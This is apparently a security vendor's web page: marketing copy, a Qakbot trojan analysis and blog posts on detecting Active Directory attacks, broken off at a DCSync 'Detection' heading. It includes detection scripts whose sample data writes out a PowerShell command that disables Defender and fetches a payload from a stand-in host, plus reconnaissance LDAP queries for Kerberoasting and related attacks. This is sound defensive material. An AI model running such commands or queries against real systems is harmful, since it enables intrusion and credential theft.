There’s a Reason the Most Important Data on Earth is protected by Fidelis
5 of the 6 US Military Branches Defended
7 of the 10 Largest US Government Agencies Protected
6.7M Year-to-Date High Severity Malware Threats Identified
16K Year-to-Date Critical Vulnerability Exploitation Attempts Detected

Protecting the leading enterprises and government agencies worldwide for over 20 years.
Why is Fidelis winning against its competitors?
Our customers detect post-breach attacks over 9x faster.
The Fidelis Challenge.
No one sees what we see and we'll prove it
Run Fidelis Elevate in your enterprise environment for 30 days. We guarantee we will find threats your current provider has never even seen. If we are wrong, we will pay you $50,000 or donate $50,000 to a children’s charity of your choice.

Products
Discover Our Product
The Fidelis Elevate
Built on a Foundation of AI (Before it was Cool)
Our customers rely on our AI-driven Fidelis Elevate to:
Predict future attacks before they happen
Stop phishing attempts in real-time
Conduct rapid forensic analysis to confidently respond to present threats

The Fidelis Halo™
Built on a Foundation of AI (Before it was Cool)
Our customers rely on our AI-driven Fidelis Halo™ to:
Predict future attacks before they happen
Stop phishing attempts in real-time
Conduct rapid forensic analysis to confidently respond to present threats

No one sees what we see and we'll prove it
Our customers detect post-breach attacks over 9x faster.
Take the Fidelis Challenge:
Run Fidelis in your environment for 30 days. We guarantee we will find threats your current provider has never even seen. If we are wrong, we will write you a check for $25,000 or donate to a charity of your choice.


Case Study
Lyell Immunopharma Improves Cloud Security with Fidelis Security
Lyell Immunopharma is a South San Francisco-based, publicly traded cell therapy company (LYEL). Their T cell reprogramming technology focuses on the mastery of T cells to cure patients with solid tumors. They apply proprietary genetic and epigenetic reprogramming technology platforms to address barriers present in solid tumors in order to develop new medicines with improved, durable, and potentially curative clinical outcomes.
Testimonials
What Our Client Say About Us
I know it’s unlikely to ever be 100% secure, but QGroup and Fidelis give me confidence that our security is at the highest possible level.
Fidelis achieves Gold in Cybersecurity from Merit Awards: “...a reflection of the innovations and technology advancements the industry has made over the last year.”
Policy assignments work surprisingly well. I can just set policies for our assets and servers, and those policies apply to any new instances that we spin up.
Resources
Check Out Our Recent Content
New Variants of Qakbot Banking Trojan
Qakbot (aka Qbot or Pinkslipbot) is a banking trojan first discovered in 2008. It is a self-propagating virus designed to steal sensitive data on target networks. Qakbot also provides remote code execution (RCE) capabilities, allowing attackers to manually achieve secondary objectives, such as scanning the compromised network or injecting ransomware. Qakbot’s modules allow automated targeting of financial data, locally stored emails, system passwords or password hashes, website passwords, and cookies from web browser caches. Attackers can also use Qakbot to steal credentials by logging keystrokes.
This blog post analyzes two new distribution vectors Qakbot uses for initial infection of targeted systems. From 2020 through 2022, Qakbot has leveraged a variety of infection vectors that originate in malware phishing campaigns (Figure 1). However, in recent months, Qakbot has successfully infected networks via Microsoft OneNote files (.one file extension) and HTML application files (.hta file extension).
Figure 1: Qakbot Distribution Vectors
Qakbot Detection Challenges
Qakbot routinely defies antivirus (AV) systems, making its presence difficult to spot. The malware persists in a local system environment and will not decrypt its payload or execute in some scenarios, such as when it detects virtualization, certain security products, or specific Windows Registry keys. This allows Qakbot to conceal itself and prevents security researchers from discovering and analyzing the payload. Another Qakbot stealth strategy is injecting itself (or piggybacking) into legitimate application processes.
One potential indicator of a Qakbot compromise is an unauthorized run key in the Windows Registry. Registry run keys facilitate automatic program execution upon user log-in or system start-up. Qakbot leverages that functionality to auto-start itself, which facilitates persistence on a system. However, Qakbot routinely receives updates in response to published security research so that it can mask its known indicators of compromise (IOCs), making it difficult for security teams to hunt for this threat with confidence.
Latest Distribution Techniques
The most effective way to track Qakbot is to keep up with the latest attack vectors. This section outlines two new distribution techniques seen in the wild as of March 2023.
Technique 1: Distribution Via a OneNote File
A .one file is a notebook created by the Microsoft OneNote office productivity application. These files contain one or more sections, each containing pages of notes. OneNote files may contain text, digitized handwriting, and objects pasted from other applications, such as images, drawings, and audio or video clips.
Qakbot campaigns using the OneNote attack vector originate as phishing emails. In this technique, the malware masquerades as a .one file attachment. User interaction with the attachment begins the infection process. The malware drops its executable payload (a randomly named .dat file) at a targeted path through execution of Windows command line and PowerShell scripts. The Qakbot PowerShell also disables Windows Defender’s real-time detection capabilities. Upon successful launch of the payload file, the Qakbot infection communicates back to its command and control (C2) server to exchange stolen data and establish further infection capabilities.
Figure 2: PowerShell Dropper Component
Figure 3: Qakbot Infection Chain Via OneNote Files
Technique 2: Distribution Via an HTML Application File
The .hta file extension is a file format used in HTML applications. HTML applications can contain hypertext code, Visual Basic scripts, or JavaScript code, depending on the program setup. Since .hta files are treated as stand-alone programs, they can execute outside of the confines of a browser’s security context. Because of this, they are treated as trusted applications. The text format of .hta makes them editable by any program that can edit plain text. The default file-association for the .hta extension is the Microsoft HTML Application Host (mshta.exe). These files store executable code that can be run from an HTML document.
As with the majority of malware, Qakbot’s initial infection vector relies upon spam emails and unsuspecting user interaction. Once the user opens the .hta file attachment, the embedded, malicious JavaScript serves as a loader to drop an executable payload (again, a randomly named .dat file) to its targeted file path. Upon launching the payload file, the Qakbot infection communicates with its C2 server.
Figure 4: Qakbot Infection Chain Via HTML Application Files
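As an added illustration (not Fidelis code and not part of the original post) of how the two delivery chains above, together with the run-key persistence noted earlier, could be hunted in endpoint telemetry; the event field names, the Sysmon-style sample events and the user-writable drop-path heuristic are assumptions made for this example.

```python
"""Hunting the OneNote and .hta Qakbot delivery chains in endpoint telemetry.

Input records are constructed, Sysmon-style process-creation and registry-set
events; the field names (type, id, parent_image, image, command_line, target,
data) are assumptions, not a real product schema.
"""
import re
from dataclasses import dataclass

# Script hosts the lure hands execution to (cmd, PowerShell and mshta per the post).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
LURE_PARENTS = {"onenote.exe"}
# Auto-start run keys used for persistence (T1547.001).
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Defender real-time protection switched off via the real Set-MpPreference parameter.
DEFENDER_OFF_RE = re.compile(
    r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.IGNORECASE)
# A Windows path ending in .dat, the randomly named payload the post describes.
DAT_PATH_RE = re.compile(r"[A-Za-z]:\\\S*\.dat\b", re.IGNORECASE)
# User-writable drop locations (assumption: where such payloads usually land).
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    technique: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> list:
    """Rules for one process-creation event."""
    out = []
    parent = _basename(ev.get("parent_image", ""))
    image = _basename(ev.get("image", ""))
    cmd = ev.get("command_line", "")
    if parent in LURE_PARENTS and image in SCRIPT_HOSTS:
        out.append(Finding(ev["id"], "onenote_spawns_script_host", "T1204.002 / T1218.005"))
    if image == "mshta.exe" and re.search(r"\.hta\b", cmd, re.IGNORECASE):
        out.append(Finding(ev["id"], "mshta_executes_hta", "T1218.005"))
    if image in {"powershell.exe", "pwsh.exe"} and DEFENDER_OFF_RE.search(cmd):
        out.append(Finding(ev["id"], "defender_realtime_disabled", "T1562.001"))
    m = DAT_PATH_RE.search(cmd)
    if m and USER_WRITABLE_RE.search(m.group(0)):
        out.append(Finding(ev["id"], "dat_payload_in_user_writable_path", "T1204.002"))
    return out


def check_registry(ev: dict) -> list:
    """Run-key value pointing into a user-writable directory (T1547.001)."""
    if RUN_KEY_RE.search(ev.get("target", "")) and USER_WRITABLE_RE.search(ev.get("data", "")):
        return [Finding(ev["id"], "run_key_to_user_writable_path", "T1547.001")]
    return []


def scan(events) -> list:
    """Apply the rules to a stream of events and collect every finding."""
    findings = []
    for ev in events:
        if ev.get("type") == "process_create":
            findings.extend(check_process(ev))
        elif ev.get("type") == "registry_set":
            findings.extend(check_registry(ev))
    return findings


# Constructed sample telemetry (not from a real incident).
SAMPLE_EVENTS = [
    {"type": "process_create", "id": 1,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c start /min powershell.exe -ep bypass -f C:\Users\alice\AppData\Local\Temp\open.ps1"},
    {"type": "process_create", "id": 2, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
                     r'Invoke-WebRequest http://example.invalid/p -OutFile C:\Users\alice\AppData\Local\Temp\kzr7q1.dat"'},
    {"type": "process_create", "id": 3,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Users\alice\Downloads\invoice.hta"'},
    {"type": "process_create", "id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\alice\Documents\notes.docx"'},
    {"type": "registry_set", "id": 5,
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\kzr7q1",
     "data": r"C:\Users\alice\AppData\Roaming\Microsoft\kzr7q1.dat"},
    {"type": "registry_set", "id": 6,
     "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "data": r"C:\Program Files\Vendor\Updater.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.rule} ({f.technique})")
```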
Follow-on Actions
Once the malicious .dat file is executed it communicates back to the command-and-control server located at (in this case) 139.99.117.17. As shown in Figure 5, this is a well-known malicious host.
Figure 5: Command and Control Server
Once the system is infected, Qakbot will:
- Collect information about the compromised host
- Create scheduled tasks to escalate privileges and establish persistence
- Harvest credentials
- Dump credentials (.exe access)
- Steal passwords from browser history and cookies
- Target web banking links with web injects
- Perform brute-force password guessing
- Manipulate Windows Registries to maintain persistence
- Self-replicate
- Perform process injection to conceal its operations
MITRE ATT&CK Tactics & Techniques:

| ID | Tactic | Technique |
|---|---|---|
| TA0001 | Initial Access | T1566.001 – Spearphishing Attachment |
| TA0002 | Execution | T1027 – Obfuscated Files or Information; T1204.001 – Links via OneNote/.hta file; T1204.002 – Attachment file via OneNote/.hta file |
| TA0003 | Persistence | T1053.005 – Scheduled Task; T1547.001 – Registry Run Keys / Startup Folder |
| TA0004 | Privilege Escalation | T1053.005 – Scheduled Task |
| TA0005 | Defense Evasion | T1027.002 – Software Packing; T1055 – Process Injection; T1218.005 – OneNote spawns MSHTA to execute embedded .hta file; T1497.001 – System Checks |
| TA0006 | Credential Access | T1003 – OS Credential Dumping; T1110.001 – Password Guessing; T1555.003 – Credentials from Web Browsers |
| TA0007 | Discovery | T1016 – System Network Configuration Discovery |
| TA0011 | Command and Control Server | T1071.001 – Web Protocols; T1090 – Proxy; T1090.002 – External Proxy |
Fidelis Elevate detects Qakbot Banking Trojan automatically as part of the curated and in-house intelligence feeds that provide insight into the most pressing threats. Additionally, Fidelis Network’s active threat detection can help narrow the search by providing insight into the exact MITRE ATT&CK TTPs that are present in customer environments.
Stay Up to Date with the Monthly Threat Intelligence Summary
Every month, the Fidelis Cybersecurity Threat Research Team analyzes the latest cyber security news, threats, vulnerabilities, and exploits. These findings are published in the Threat Intelligence Summary, along with useful links and analysis so that you can stay ahead of threats. Be sure to read the latest report. Also, subscribe to the Threat Geek blog for timely information that matters most to cyber security professionals.
Fidelis Cybersecurity Awarded Gold for Security Innovations by Merit Awards
We are thrilled and honored to be recognized with the Gold Medal for Security from Merit Awards! This award underscores our strong dedication to cybersecurity excellence as we work tirelessly to protect the world’s most sensitive data and IT assets. Through our leading-edge technology, we offer deeper visibility, faster threat detection and response, and continuous risk assessment, all while ensuring unified cloud security and compliance.
Marie Zander, Executive Director of the Merit Awards, said, “There was an overwhelming volume of Merit Awards Telecom submissions this year which clearly is a reflection of the innovations and technology advancements the industry has made over the last year.”
We’ve engineered Fidelis Elevate and Fidelis CloudPassage Halo platforms to empower organizations with the ability to build a proactive cyber defense strategy by detecting and mitigating threats before they can compromise critical assets.
Thank you to Merit Awards for this recognition, we look forward to continuing to invest in research and development to deliver the best possible proactive cybersecurity solutions on this journey toward a more secure digital future.
Read the press release to learn more
How to Spot and Stop Active Directory Attacks Faster
Active Directory (AD) attacks can happen fast. You must be faster. Once an attacker assumes an AD user account, your chances of finding them dwindle. They can gain widespread access – even that of an administrator. They can move through systems undetected and execute code as if they were the assumed user. By the time you realize something is wrong, it is often too late; the damage is done. The attacker has exfiltrated data, infected systems, or detonated ransomware. You’re left to clean up the mess.
In this blog, we will show how, through network monitoring, you can catch attackers who target Active Directory environments. The best detection techniques catch attackers in the earliest stage possible while reducing false positives. For that reason, we will focus here on catching attackers during the Reconnaissance stage, which is an early part of any attack.
LDAP Reconnaissance
By default, any normal AD user in a domain has LDAP read permissions for that domain.
Thus, an attacker who compromises a domain user (a user who is not a member of a highly privileged group such as Domain Admins) will be able to perform domain reconnaissance to map the domain objects. Reconnaissance is a key part of any AD attack, as it allows the attacker to map the victim’s environment. They can then use that intelligence for lateral movement and privilege escalation. We will focus on the following LDAP attributes to catch attackers in the reconnaissance stage:
UserAccountControl
The UserAccountControl attribute within AD specifies the configuration of specific account settings. For example: UserAccountControl can indicate disabled accounts or accounts that do not require Kerberos pre-authentication when logging in.
The following list contains all the possible options for UserAccountControl:
Image Source: Microsoft
We will focus on LDAP queries where attackers look for the following UserAccountControl flags:
PASSWD_NOTREQD, DONT_REQ_PREAUTH, TRUSTED_FOR_DELEGATION, ENCRYPTED_TEXT_PWD_ALLOWED.
PASSWD_NOTREQD
When an AD user account has the PASSWD_NOTREQD flag, the account can have an empty password. Attackers will look for those accounts to try without a password. The attacker’s goals are to move laterally on the domain and compromise domain accounts. The faster they can achieve that objective, the less likely it is that they’ll be detected at this early stage of attack. Logging into these types of AD accounts accelerates the time to infiltration by eliminating the need to discover an account password.
We will flag the following LDAP query as suspicious:
DONT_REQ_PREAUTH
When an AD user account has DONT_REQ_PREAUTH flag, the attacker can ask for an encrypted Ticket Granting Ticket (TGT) for the user without providing a password. The TGT is signed with the target user password, allowing the attacker to try brute forcing the password offline. This type of attack is known as ‘As-Rep Roasting’ (MITRE T1558.004).
We will flag the following LDAP query as suspicious:
TRUSTED_FOR_DELEGATION
When an AD computer account has the TRUSTED_FOR_DELEGATION flag set, the computer will save the Ticket Granting Ticket (TGT). An attacker who manages to compromise the computer account will be able to dump the KERBEROS TGT tickets for all logged-on users. The attack is known as . In addition, attackers can use various techniques to force authentication to the victim computer account, and then dump the KERBEROS TGT tickets later.
We will flag the following LDAP query as suspicious:
ENCRYPTED_TEXT_PWD_ALLOWED
When an AD user account has the ENCRYPTED_TEXT_PWD_ALLOWED flag set, an attacker who compromises the AD database gains read access to the user account password in clear text. Typically, these passwords would appear in NTLM hash format. Clear-text access accelerates an attack by eliminating the need to brute force the password.
We will flag the following LDAP query as suspicious:
Service Principal Name
Service Account
A service account is an AD user account created to run a specific service or application.
For example, if a SQL service needs access to resources over the domain, a service account with the right access to the resources can be created and used by the service.
AD uses the service principal name (SPN) attribute to differentiate between different services.
Every service account will have an SPN defined representing the specific service it was created for.
KERBEROS Service Tickets
Upon Kerberos authentication, any logged-in user can request the Kerberos domain controller (KDC) for access to any service on the domain. The service is identified by SPN.
When an account asks for access to a service on the domain, the KDC returns a service ticket to the client. The service ticket is encrypted with the password hash of the requested domain object hosting the service. For example, when connecting using SSH to a domain computer, the service ticket is encrypted with the domain computer hash hosting the SSH service. An attacker who receives the service ticket can attempt to brute force the hashed password offline.
The password of a machine account is set randomly with a length of 120 characters, whereas passwords of user accounts are usually shorter and often follow predictable patterns. This makes a brute force attempt on a user password faster and easier than trying to crack a machine account password.
KERBEROASTING ATTACK
Because service accounts have an SPN configured, and any logged-on user can ask for a service ticket in the domain, an attacker who compromises a low-privileged domain user can search for service users, request service tickets for them, and brute force their passwords offline. The attack is known as ‘KERBEROASTING’ (MITRE T1558.003).
An example for a suspicious LDAP query:
Clear Text Passwords
The following LDAP attributes may contain passwords in clear text:
UnixUserPassword
UnixUserPassword is an LDAP attribute for UNIX-based systems. Attackers can enumerate the domain for users with UnixUserPassword configured, as it might be saved in clear text.
An example for suspicious LDAP query:
Description
A poorly configured Active Directory environment may contain passwords in the description attribute:
We will flag LDAP queries that look for a password in the description, for example:
NT-Security-Descriptor
Active Directory uses access control lists (ACLs) for account authorization.
Knowing the ACLs of accounts in AD allows attackers to plan their lateral movement and privilege escalation on the domain. , an open-source tool, uses ACL analysis to map the possible attacks on a given domain:
AD saves the ACL of an object in ’nTSecurityDescriptor’ LDAP attribute.
The ’nTSecurityDescriptor’ is divided into four parts:
- Owner – The owner of the object
- Group SID (Security identifier) – The group associated with the object
- DACL – Allow/Deny list for the object
- SACL – Auditing permissions for the object

An attacker who compromises a low-privileged AD user will not have permission to read the SACL part of the security descriptor. From the attacker’s perspective, the DACL is the most important part of the descriptor, as it identifies the authorized actions for the object within the domain. To get the DACL part of the security descriptor using LDAP, the attacker must specify which part of the descriptor they are interested in. LDAP uses a control named ’LDAP_SERVER_SD_FLAGS_OID’ that controls which part of the descriptor is retrieved.
The following flags describe the different possible descriptor parts:
To catch an attacker who performs ACL analysis using LDAP, we monitor requests for the nTSecurityDescriptor attribute that carry one of the LDAP_SERVER_SD_FLAGS_OID flags. For example, we can identify an attacker who asks for the DACL only:
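The detection logic sketched across the sections above (UserAccountControl flag hunting, SPN enumeration for Kerberoasting, clear-text password attributes, and nTSecurityDescriptor requests with the SD_FLAGS control), written out as an added example that is not Fidelis code or part of the original post. The parsed-request shape, the sample queries and the source addresses are constructed; the bit values, OIDs and sAMAccountType constant are Microsoft's published ones.

```python
"""Flagging the LDAP reconnaissance queries described above.

Each input is one parsed LDAP SearchRequest as a dict with keys src, filter,
attributes and controls (a list of (oid, flags) pairs); that shape, the sample
queries and the source addresses are constructed for this example.
"""
import re

# userAccountControl bits the post says attackers hunt for (Microsoft UF_* constants).
UAC_FLAGS = {
    0x0020: "PASSWD_NOTREQD",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"  # extensible match used to test UAC bits
LDAP_SERVER_SD_FLAGS_OID = "1.2.840.113556.1.4.801"    # control selecting security-descriptor parts
SD_PARTS = {0x1: "OWNER", 0x2: "GROUP", 0x4: "DACL", 0x8: "SACL"}
SAM_USER_OBJECT = "805306368"                          # sAMAccountType value for user objects

_UAC_RE = re.compile(r"useraccountcontrol:" + re.escape(LDAP_MATCHING_RULE_BIT_AND) + r":=(\d+)")


def classify_query(query: dict) -> list:
    """Return detection labels for one search request (empty list = nothing suspicious)."""
    filt = query.get("filter", "").lower()
    attrs = {a.lower() for a in query.get("attributes", [])}
    labels = []
    # 1. userAccountControl bit tests for the four weak-configuration flags.
    for m in _UAC_RE.finditer(filt):
        mask = int(m.group(1))
        labels += [f"uac_recon:{name}" for bit, name in UAC_FLAGS.items() if mask & bit]
    # 2. Kerberoasting: SPN-bearing *user* accounts (computer passwords are long and random).
    if "serviceprincipalname=*" in filt and (
            f"samaccounttype={SAM_USER_OBJECT}" in filt or "!(objectclass=computer)" in filt):
        labels.append("kerberoast_spn_enum")
    # 3. Clear-text password hunting in unixUserPassword or description.
    if "unixuserpassword=*" in filt:
        labels.append("cleartext:unixUserPassword")
    if re.search(r"description=[^)]*pass", filt):
        labels.append("cleartext:description")
    # 4. ACL reconnaissance: nTSecurityDescriptor requested with an SD_FLAGS control.
    if "ntsecuritydescriptor" in attrs:
        for oid, flags in query.get("controls", []):
            if oid == LDAP_SERVER_SD_FLAGS_OID:
                parts = [name for bit, name in SD_PARTS.items() if flags & bit]
                labels.append("acl_recon:" + "+".join(parts))
    return labels


def scan_queries(queries) -> dict:
    """Map each source address to its sorted labels, keeping only sources with a hit."""
    hits = {}
    for q in queries:
        for label in classify_query(q):
            hits.setdefault(q["src"], set()).add(label)
    return {src: sorted(labels) for src, labels in hits.items()}


# Constructed search requests, as a network sensor might decode them.
SAMPLE_QUERIES = [
    {"src": "10.0.5.23", "filter": "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))",
     "attributes": ["sAMAccountName"], "controls": []},
    {"src": "10.0.5.23", "filter": "(&(samAccountType=805306368)(servicePrincipalName=*))",
     "attributes": ["sAMAccountName", "servicePrincipalName"], "controls": []},
    {"src": "10.0.5.23", "filter": "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))",
     "attributes": ["dNSHostName"], "controls": []},
    {"src": "10.0.5.41", "filter": "(unixUserPassword=*)", "attributes": ["unixUserPassword"], "controls": []},
    {"src": "10.0.5.41", "filter": "(description=*pass*)", "attributes": ["description"], "controls": []},
    {"src": "10.0.5.41", "filter": "(objectClass=*)", "attributes": ["nTSecurityDescriptor"],
     "controls": [(LDAP_SERVER_SD_FLAGS_OID, 0x4)]},   # DACL only, the case the post singles out
    {"src": "10.0.7.9", "filter": "(&(objectClass=user)(sAMAccountName=alice))",
     "attributes": ["mail", "memberOf"], "controls": []},  # ordinary lookup, must not fire
]

if __name__ == "__main__":
    for src, labels in scan_queries(SAMPLE_QUERIES).items():
        print(src, labels)
```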
Conclusion
Threat actors continually innovate, creating new and novel techniques to gain access to confidential information. Reconnaissance is a key part of any AD attack. Without mapping AD objects and their connections, the attackers will find it difficult to compromise the domain. Applying detection rules helps catch the attackers early on before any damage is done. To keep your organization safe, ensure your systems are up to date, and that you have installed an automated detection system, such as Fidelis Elevate, to proactively defend against cyber-threats and active attacks.
Subscribe to the Threat Geek blog for the latest updates, threat research, and industry insights from the professionals at Fidelis Cybersecurity. To see first-hand how the Fidelis Cybersecurity platforms help security teams worldwide protect, detect, respond, and neutralize even the most advanced cyber adversaries across network, endpoints, and cloud, schedule a free demo.
Beyond Cybersecurity: The Role of Cyber Resiliency in Network Defense
Is your organization’s security strategy prepared to face modern cyber threats? Cyber threats are evolving at an unprecedented pace, demanding organizations to align their security strategies accordingly. Traditional security methods prove ineffective against advanced threats and sophisticated attacks. Despite implementing new security measures, cybercriminals consistently outpace defenses, leveraging advanced technologies like AI/ML, deepfakes, and as-a-service malware and ransomware delivery. Make cyber resiliency your organization’s top priority and actively safeguard your network from potential threats.
According to the National Institute of Standards and Technology (NIST), cyber resilience is: “the ability to anticipate, withstand, recover from, and adapt to adverse conditions, stresses, attacks, or compromises on systems that use or are enabled by cyber resources.” The key here is to anticipate and be proactive in protecting data and IT assets, regardless of what happens, so that network operations continue as normal.
Proactive Cyber Defense is Gaining Traction
At Fidelis Cybersecurity, we recently surveyed over 11,000 of our LinkedIn followers and found that an increasing number of organizations are adopting a proactive approach to cybersecurity. And it’s a good thing! Proactive cyber defense means that you’re focused on getting ahead of attacks and reclaiming the advantage over adversaries. Those proactive measures are a natural step toward building a more resilient network.
Figure 1: Survey results – How organizations approach cybersecurity in 2023.
Cyber Resiliency is All the Rage
In 2020, the world underwent an overwhelming period of rapid digital transformation. By the end of that year, IDG revealed that 78% of cybersecurity leadership lacked confidence in their organization’s security posture. Shortly thereafter, IDC predicted a surge in cyber resiliency spending. Ever since, consumer and government groups have committed to collective actions on cyber resiliency, including:
- Global oil companies at The World Economic Forum, May 2022
- CISA, in their Strategic Plan for 2023-2025
- The United States White House’s national security strategy, March 2023
And those are just a few examples that the world is moving away from talking solely about security, turning instead toward building resiliency.
Cybersecurity vs. Cyber Resiliency: What’s the Difference?
If you’re like us, you’ve spent your entire career focusing on keeping your organization safe from cyber threats. But recent high-profile attacks, demonstrate that our focus on “security” isn’t working. One could assume that, had these organizations placed more emphasis on resiliency, they might have been better prepared to withstand and recover from these adversities.
Let’s explore the reason behind this.
Security is binary in nature. Something is secure, or it’s not. It focuses on keeping bad actors out and responding if-and-when a breach takes place. However, as we all know, attackers find their way inside regardless. Or they originate as inside threats–even if they’re just innocent users accidentally clicking an infected link.
Resilience takes on the “what-if” questions and picks up where security leaves off. It adapts to the chaos of our rapidly changing cyber landscape and acknowledges that a successful cyber-attack or accidental breach is a matter of “when”, not “if”. It solidifies the tools and processes required for rapid post-breach detection and response, surpassing traditional defensive security solutions.
Figure 2: security vs. resilience.
Organizations must continuously assess and update their security measures, identify potential vulnerabilities, and train their employees to recognize and respond to cyber threats. Failure to prioritize this can result in significant financial losses, reputational damage, and legal liabilities, as demonstrated above.
Hope for the Best; Plan for the Worst
About now, you might be thinking that the days of cybersecurity are over. It’s true that, to outmaneuver threat actors and promote business continuity, organizations must prioritize resiliency but not at the cost of security.
Security-focused strategies hope for the best. They aim to keep adversaries out by building strong defenses and keeping track of all the data, assets, users, connections, and potential risks inside. Resiliency plans for the worst. A resiliency strategy assumes that the threat actor is already inside and aims to shorten the attack lifecycle while placing a strong emphasis on continuity.
A highly automated, proactive cyber defense is the sweet spot between security and resiliency. It hopes for the best and plans for the worst at the same time.
Figure 3: How security strategies can embrace resiliency
Adversaries focus on exploiting the weakest link in the system, penetrating deeper, staying longer, and causing lasting damage once they bypass defenses. Balancing resiliency with security provides two critical benefits:
- You’ll catch the adversary as early in their attack lifecycle as possible—before the damage is done, and
- You’ll provide critical intelligence into attacker movements so that security becomes a process of continuous improvement.
With the right balance in place, organizations can effectively mitigate risk, respond quickly to post-breach attacks, and distract adversaries to protect critical data and systems, all while keeping assets available through and beyond a breach.
Navigating Cyber Resiliency Together
At Fidelis Cybersecurity, we are proud to say that we are ahead of the cyber resiliency trend. Our technology is designed for proactive cyber defense, providing customers with deep insights into threat actors’ movement within their network. Our platforms couple intelligent deception with active threat detection to distract post-breach attackers, shorten the attack lifecycle, and keep data and assets safe before, throughout, and beyond an attack. With strong resiliency-based solutions, we help customers protect, detect, respond, and neutralize threats faster so that they can minimize the impact of any breaches and keep networks running strong.
Read more about cyber resiliency in our whitepaper or watch our on-demand webinar on the topic.
April 2023 Threat Intelligence Summary
When threats emerge, the Fidelis Cybersecurity Threat Research team (TRT) is ready. Each month, the Threat Intelligence Summary examines the latest threats and trends so you can stay resilient against cyber adversaries.
In April 2023, we saw a continued rise in Russian state-sponsored threat actors, the shutdown of a widely used hacker marketplace, “shadow ban” attacks against Twitter users, and the emergence of several new high and critical vulnerabilities, including a zero-day exploit against Google Chrome. We also provide updates to the metrics and information on the most impactful vulnerabilities and malware strains in the wild today and included information on some of the top phishing sites observed over the month.
Read the April 2023 Threat Intelligence Summary
Top Emerging Vulnerabilities
The Fidelis Cybersecurity TRT’s top-ten vulnerability list for March includes critical and high severity CVEs that, when exploited, lead to privilege escalation, distributed denial of service attacks (DDoS), arbitrary code execution, and more.
We also include the base scores for each of our top vulnerabilities. The base score is a complex calculation that weighs several factors, including exploitability (attack complexity, scope, privileges required, etc.), impact metrics, CVE maturity, and more. The value, from 0 to 10, represents the potential severity of the threat. The higher the number, the more critical the CVE.
These base scores serve as one reliable indicator of threat criticality. However, there are many factors that go into our top ten inclusion. The list presented in our report represents what we have observed as the month’s most credible threats to any organization using unpatched systems or software. Whether a vulnerability is newly discovered, has proofs of concept available, or is being actively exploited, regular patch management is imperative for securing your organization.
Malware Attacks by Industry
Fidelis Cybersecurity tracks the most prevalent malware threats to keep our detection feeds up to date and our clients secure. In April 2023, Fidelis detected and defended against more than two hundred and two thousand high-severity malware threats. For the April report, we continue with the addition of metrics to examine submissions to the Fidelis Sandbox malware analysis service. Read the report to see how we curate and evaluate sandbox samples. You’ll also get a deep dive into some of the hardest hit industries over the past month, and details regarding the most prevalent malware threats indicated by open-source reporting.
Top Phishing Domains
Each month, our report contains the top five active phishing sites observed in the wild. While the best defense against phishing is user vigilance, security teams can rely on emerging data like this to help bolster defenses.
See the top phishing domains list >
About the Fidelis Cybersecurity Threat Research Team
The Threat Research team at Fidelis Cybersecurity researches and analyzes the latest threats and issues. The intelligence we gather from multiple open-source and proprietary sources about our cyber adversaries’ tactics, techniques, and procedures (TTPs) is fed directly into our platforms, products, and services to help our customers detect, neutralize, and eliminate threats before they can harm production systems.
Visit the Fidelis Cybersecurity Threat Research page to read the complete April 2023 Threat Intelligence Summary, along with information on critical threats and resources to help you better prepare for the next attack.
How to Spot and Stop Active Directory Attacks Faster – Part 2
In the previous blog, we described how to catch attackers targeting Active Directory (AD) in the reconnaissance stage, which is one of the earliest stages of the attack. We mainly focused on LDAP protocol, flagging suspicious queries.
In part two, we describe how to detect more advanced AD attacks that are based on DCE/RPC protocol.
In an AD environment, DCE/RPC protocol-based attacks can have severe consequences: they can compromise domain controllers, escalate privileges, or facilitate lateral movement within the network. AD relies on the RPC mechanism for many of its operations, which makes it an attractive target for adversaries. We will focus on the following attacks: DCSync, DCShadow, and extraction of the domain DPAPI backup key from domain controllers. We will use Network Traffic Analysis (NTA) to detect them.
DCSync
MITRE ATT&CK: T1003.006
Attack name: DCSync
Common attacking tools: Mimikatz, Impacket
An attacker who has compromised an AD user account can pretend to be a Domain Controller (DC) and ask for sensitive information, provided the compromised account holds the following permissions: Replicating Directory Changes and Replicating Directory Changes All. The attacker leverages the Directory Replication Service Remote Protocol, which is used for replication between domain controllers. In particular, they call the DsGetNCChanges function, which retrieves data updates from the DC.
While the attacker typically uses Mimikatz for this, other tools work as well. Regardless of the tool, the request asks the DC for the user and computer NTLM hashes stored in the AD database file (NTDS.DIT). Once the attacker has the hashes, they can attempt offline brute-force cracking to recover passwords, or, with the hash of the krbtgt service account, perform a golden ticket attack.
Figure: Attacker using Mimikatz DCSync to obtain the NTLM hash of the Administrator account
Detection
